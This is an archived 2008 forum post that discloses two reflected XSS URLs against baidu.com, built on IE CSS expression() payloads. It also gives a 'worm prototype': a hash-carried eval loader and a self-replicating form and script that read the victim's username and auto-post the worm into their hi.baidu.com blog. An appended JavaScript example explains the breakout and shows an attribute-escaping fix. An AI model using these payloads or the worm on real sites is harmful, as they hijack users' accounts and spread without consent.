712100 Community's Archiver

sunzn posted on 2008-6-30 21:59

Two XSS points on baidu

Heh, this time it's Baidu's turn to be unlucky!

http://www.baidu.com/index.php?tn="/**/style=xss:expression(alert('sunzn-xss'));
http://www.baidu.com/index.php?bar="/**/style=xss:expression(alert('sunzn-xss'));

When you copy the code, be sure to copy the trailing semicolon into the address bar as well, otherwise you won't see the XSS effect!

Below is also a worm prototype

Run Once: http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval('window.r=1;eval(unescape(location.hash.substr(1)))'):1);#alert%28%29
<div id="xssworm">
<!-- action is filled in by the script below once the blog owner's name is known -->
<form name="form1" id="popFormSubmit" action="" method="post">
<input type="hidden" name="ct" value="1">
<input type="hidden" name="cm" value="1">
<input type="hidden" id="url" name="spRefURL" value="">
<input type="hidden" id="title" name="spBlogTitle" value="Baidu has a new vulnerability again">
<input type="hidden" id="content" name="spBlogText" value="">
<input type="hidden" name="spBlogCatName" value="Default category">
<input type="hidden" name="spIsCmtAllow" value="1">
<input type="hidden" name="spBlogPower" value="0">
<input type="hidden" name="spVcode" value="">
<input type="hidden" name="spVerifyKey" value="">
<input type="hidden" name="tj" value=" Publish post ">
</form>
<script>
function $(i){return document.getElementById(i);}
window.onload = function(){
    // the page text starts with the logged-in user's name, followed by "|"
    var j=document.body.innerText;
    var i=j.indexOf("|");
    j=j.substr(0,i);
    // post a new blog entry into that user's own hi.baidu.com space
    form1.action = "http://hi.baidu.com/"+j+"/commit";
    // the entry body is this whole div, so every reader re-posts the worm
    $("content").value = escape($("xssworm").outerHTML);
    form1.submit();
}
</script>
</div>

[[i] This post was last edited by sunzn on 2008-6-30 22:10 [/i]]
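The three mechanics the post relies on, as an added example that is not part of sunzn's post or of anything Baidu shipped: a hypothetical reflecting template (`renderVulnerable`; the real Baidu markup is not on the page, so a hidden input that echoes `tn` unescaped is assumed), a simplified IE-style attribute tokenizer that shows the `"/**/style=` payload breaking out of the `value` attribute, the `(window.r!=1)?...:1` guard that keeps a CSS `expression()` payload from re-running on every layout pass, and the `location.hash` trick that carries the real payload in a part of the URL the server never sees. `escapeAttr`/`renderFixed` are the hardened counterpart; `attributeNames` and `simulateReflows` are helper names chosen here.

```javascript
// Added example, not code from the original post.
// Assumption: the vulnerable sink is a hidden input whose value attribute
// echoes the query parameter without HTML-attribute encoding.
const PAYLOAD = '"/**/style=xss:expression(alert(\'sunzn-xss\'));';

function renderVulnerable(tn) {
  return '<input type="hidden" name="tn" value="' + tn + '">';
}

// The fix: encode the characters that can end or restart an attribute.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

function renderFixed(tn) {
  return '<input type="hidden" name="tn" value="' + escapeAttr(tn) + '">';
}

// Simplified tokenizer for one start tag: whitespace and '/' separate
// attributes (old IE treated '/' as a separator, which is why the payload
// uses "/**/" instead of a space that would be URL-encoded).
function attributeNames(tag) {
  const body = tag.replace(/^<\w+/, '').replace(/>$/, '');
  const isSep = (c) => c === ' ' || c === '\t' || c === '\n' || c === '/';
  const names = [];
  let i = 0;
  while (i < body.length) {
    while (i < body.length && isSep(body[i])) i++;
    if (i >= body.length) break;
    let name = '';
    while (i < body.length && !isSep(body[i]) && body[i] !== '=') name += body[i++];
    if (body[i] === '=') {
      i++;
      const q = body[i];
      if (q === '"' || q === "'") {
        i++;
        while (i < body.length && body[i] !== q) i++;
        i++; // skip closing quote
      } else {
        while (i < body.length && !/\s/.test(body[i])) i++;
      }
    }
    names.push(name.toLowerCase());
  }
  return names;
}

// IE re-evaluates a CSS expression() on every reflow/mouse event; the
// post's (window.r!=1)?eval(...):1 guard turns that into a single run.
function makeExpression(win, body, guarded) {
  return function expression() {
    if (!guarded) { body(); return 1; }
    return (win.r != 1) ? (win.r = 1, body(), 1) : 1;
  };
}

function simulateReflows(reflows, guarded) {
  const win = {};          // stands in for window
  let runs = 0;
  const expr = makeExpression(win, () => { runs++; }, guarded);
  for (let i = 0; i < reflows; i++) expr();
  return runs;
}

// The real payload lives after '#': browsers do not send the fragment to
// the server, so it is neither logged nor filtered there. The post uses
// unescape(); decodeURIComponent gives the same result for %28%29.
function hashPayload(hash) {
  return decodeURIComponent(hash.substr(1));
}

console.log(attributeNames(renderVulnerable(PAYLOAD)));
console.log(attributeNames(renderFixed(PAYLOAD)));
console.log(simulateReflows(50, true), simulateReflows(50, false));
console.log(hashPayload('#alert%28%29'));
```

Running it shows the unescaped render producing a `style` attribute the author never wrote, the escaped render keeping the whole payload inside `value`, the guarded expression firing once across 50 simulated reflows against 50 times without the guard, and the fragment decoding to `alert()`.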


Powered by Discuz! Archiver 6.1.0  © 2001-2007 Comsenz Inc.